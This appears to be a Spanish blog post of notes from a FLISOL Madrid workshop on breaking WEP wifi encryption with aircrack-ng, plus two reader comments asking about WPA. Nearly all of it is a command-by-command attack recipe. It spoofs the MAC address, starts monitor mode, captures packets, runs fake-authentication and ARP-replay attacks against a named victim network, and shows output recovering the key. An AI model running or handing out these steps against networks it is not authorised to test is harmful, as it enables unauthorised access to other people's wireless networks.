TALLER aircrack-ng
---- ifconfig (para averiguar la propia MAC)aparece como:direcciónHW 00:13 …
---- macchanger cambia mac (de ser necesario por propia seguridad)
mi mac 00:1a:1a:01:5a:da
macchanger -m 00:11:22:33:44:55 wlan0
sudo macchanger --s wlan1
Current MAC: 00:22:57:97:ef:1c---- crear la interfaz mon0 Airmon-ng.
Aviso: Las direcciones mac SIEMPRE deben iniciar con 00
Airmon-ng es parte de la suite de aircrack-ng la cual permite crear la interfaz mon0
en modo monitor. Su utilización es la siguiente:
# airmon-ng start wlan0 (o el nombre de la interfaz que puede ser wlan0, eth1, etc)
sudo airmon-ng start wlan2
Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)---- crea archivos (con o sin filtro)
sudo airodump-ng mon0 (se selecciona el canal que se quiere escuchar … por ejemplo 12)
airodump-ng -c 12 -w (nombre_de_archivo) mon0
otra posibilidad:
(utilizado con el KISMET en lugar del airodump bueno tambien funciona bien)
---- aireplay-ng (ataque -1 pedido de autenticacion con AP)
aireplay-ng -1 6000 -q 10 -o 1 -e (ESSID victima) -a (Mac Victima) -h (MAC propia) mon0
sudo aireplay-ng -1 6000 -q 10 -o 1 -e WLAN_88 -a 00:13:49:E5:E6:3C -h 00:1D:1A:00:5A:CC mon0
---- aireplay-ng (ataque -3)
aireplay-ng -3 -b (Mac Víctima) -h (nuestra mac) mon0
sudo aireplay-ng -3 -b 00:23:F8:90:E7:1B -h 00:1e:58:97:ef:1d mon0
---- aircrack-ng
aircrack-ng *.cap
sudo aircrack-ng *.cap
Aircrack-ng 1.0
[00:40:03] Tested 785 keys (got 45395 IVs)
KB depth byte(vote)
0 2/ 3 3A(54528) 2F(53248) D1(53248) 05(52736) 6B(52736)
KEY FOUND! [ 5A:30:30:30:32:43:46:34:39:37:45:38:31 ] (ASCII: Z0002CF497E81 )
Decrypted correctly: 100%
FLISOL MADRID (Auspicia Linuxeros Softiternity) Taller a cargo de Curro Linuxero
conoces el wpacrack para android ?
ResponderEliminarY un ejemplo con redes y encriptación wpa, sin el uso del diccionario?
ResponderEliminar